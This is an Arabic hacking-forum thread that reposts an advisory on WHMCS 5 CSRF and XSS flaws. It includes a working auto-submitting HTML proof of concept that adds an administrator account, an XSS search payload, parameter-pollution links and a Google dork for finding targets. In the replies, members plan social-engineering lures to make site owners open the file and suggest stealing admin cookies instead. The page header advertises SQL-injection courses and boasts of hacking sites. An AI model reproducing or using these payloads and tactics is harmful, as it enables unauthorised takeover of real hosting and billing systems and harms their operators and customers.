1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

الموضوع في '[ الـثـغـرات ]' بواسطة Abo MalaK, بتاريخ ‏15 يونيو 2012.

كاتب الموضوع : Abo MalaK المشاهدات : 6,151 الردود : 6 ‏15 يونيو 2012
حالة الموضوع:
مغلق
  1. غير متصل

    Abo MalaK
    rank
    Developer

    عضو منذ:
    ‏15 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    السلام عليكيم
    ########
    # Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability
    # Version: Latest version 5.1 and other previous version maybe vulnerable
    # Vendor: WHMCS - The Complete Client Management, Billing Support Solution
    # Date: 2012-05-30
    # Tested on: win/linux
    # Author/Found by: Shadman Tanjim
    # Email: shadman2600gmail.com
    # Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army.
    # Special Thanks: x8631p
    # Google Dork: "Powered by WHMCompleteSolution" or inurl:WHMCS
    ##########

    CSRF Vulnerability:

    Get:
    http://site.com/clientarea.php
    http://site.com/admin/index.php
    http://site.com/admin/login.php

    Post:
    http://site.com/admin/login.php
    http://site.com/cart.php
    http://site.com/admin/configadmins.php
    http://site.com/pwreset.php


    p0c:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <h2>WHMCS CSRF ExpL0iT PoC</h2>
    </head>
    <script language="javascript" type="text/javascript" >

    function lifeissimple() {

    var token = "Token Value";

    var img = document.createElement("img");
    var site="http://www.localhost.com:80";
    var requesturl = site + "/billing/admin/configadmins.php?action=save&id=&token=" + token +
    "&roleid=1&firstname=dead&lastname=cow&email=deadc ow@deadcow.com&username=deadcow&password=
    deadcow&password2=deadcow&deptids[]=4&deptids[]=1&signature=deadcow&notes=deadcow&template=blend
    &language=English";
    img.setAttribute("src", requesturl);
    document.body.appendChild(img);

    var img2 = document.createElement("img");
    img2.setAttribute("src", site+"/billing/admin/configadmins.php?added=true&");
    document.body.appendChild(img);
    }

    </script>
    <body onload="lifeissimple();">

    </body>
    </html>


    Cross-site Scripting (XSS) Vulnerability:

    request:pOST http://site.com/knowledgebase.php?action=search HTTP/1.1
    Content-Type: application/x-www-form-urlencoded

    search='%20onerror%3D'f(PSRyh)


    HTTP Parameter Pollution :

    1.Affected link: http://site.com/cart.php?a=add&domai...913620=v992636
    Affected parameter: a=add

    2. Affected link: http://site.com/domainchecker.php?se...946774=v992350
    Affected parameter: search=bulkregister

    3. Affected link: http://site.com/cart.php?currency=2&...972751=v976696
    Affected parameter: currency=2

    المصدر :

    http://cxsecurity.com/issue/WLB-2012050220

    الثغرة تسمح لك بإضافة أدمن ..i:q2^:

    أو سحب الكوكيز تبعو ..)2:"

    لسا ماجربتها .. هلئ شفتها وحبيت شاركن فيها
    قريبا نشالله بجربها و بشرحها ..&:"
     


    جاري تحميل الصفحة...
  2. غير متصل

    D-Zoro
    rank
    Developer

    عضو منذ:
    ‏14 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    هذه الثغرة لازمها هندسة اجتماعيةi:q4^:

    يعني ترسل لصاحب الموقع ملف html الخاص بالثغرة مرفوع او

    ما شبه و عليه هو بدوره ان يكون مسجل الدخول:!."

    بعد ان يفتح الملف سيعمل تلقائيا و يضيف ادمن
    #:"​
     


  3. غير متصل

    amin
    rank
    Developer

    عضو منذ:
    ‏2 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    يوجد توكين حبيبي في سكربت whmcs ​
     


  4. غير متصل

    Anti-Trust
    rank
    Developer

    عضو منذ:
    ‏12 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    w00t
    الإقامة:

    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    شوي اسلوب هندسة اجتماعية


    وافكار راح تمشيها وراح ينضاف الادمن تلاقي
     


  5. غير متصل

    Abo MalaK
    rank
    Developer

    عضو منذ:
    ‏15 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability



    طبعا الثغرة تحتاج لهندسة إجتماعية

    بس مابتوقع أنها مشكلة بهيك نوع

    من السكريبات (لدعم الفني ) تقدر تراسل الشركة وتئولهم

    إنو بدك تنئل هالموقع لعندهم .. والأفكار كتيرة &:"

    بالنسبة لنوعها .. فالأنسب أنك تسحب الكوكيز فيها ..


    بدل ماتستعملها csrf لأنو ممكن الستاف

    مايكون عنده صلاحية يضيف أدمن ..

    نورتو الموضوع ياشباب
     


  6. غير متصل

    vŀяύš
    rank
    V • I • P

    عضو منذ:
    ‏11 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    Thank You Man
     


  7. غير متصل

    mr.mourad <span style="font-weight: bold; text-shadow: #BBBB
    V • I • P

    عضو منذ:
    ‏8 يوليو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    يعطيك الف الف العافية اخي شكراً جزيلاً على الطرح :{1}:
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...